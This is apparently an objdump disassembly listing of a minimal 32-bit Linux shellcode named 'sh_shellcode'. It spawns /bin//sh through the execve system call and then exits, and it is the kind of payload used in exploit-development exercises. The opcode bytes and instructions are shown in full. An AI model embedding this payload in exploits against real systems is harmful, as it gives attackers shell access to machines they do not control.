
sh_shellcode:     format de fichier elf32-i386


Déassemblage de la section .text :

08049000 <_start>:
 8049000:	31 c0                	xor    eax,eax
 8049002:	50                   	push   eax
 8049003:	68 2f 2f 73 68       	push   0x68732f2f
 8049008:	68 2f 62 69 6e       	push   0x6e69622f
 804900d:	89 e3                	mov    ebx,esp
 804900f:	31 c9                	xor    ecx,ecx
 8049011:	31 d2                	xor    edx,edx
 8049013:	b0 0b                	mov    al,0xb
 8049015:	cd 80                	int    0x80
 8049017:	31 c0                	xor    eax,eax
 8049019:	b0 01                	mov    al,0x1
 804901b:	31 db                	xor    ebx,ebx
 804901d:	cd 80                	int    0x80
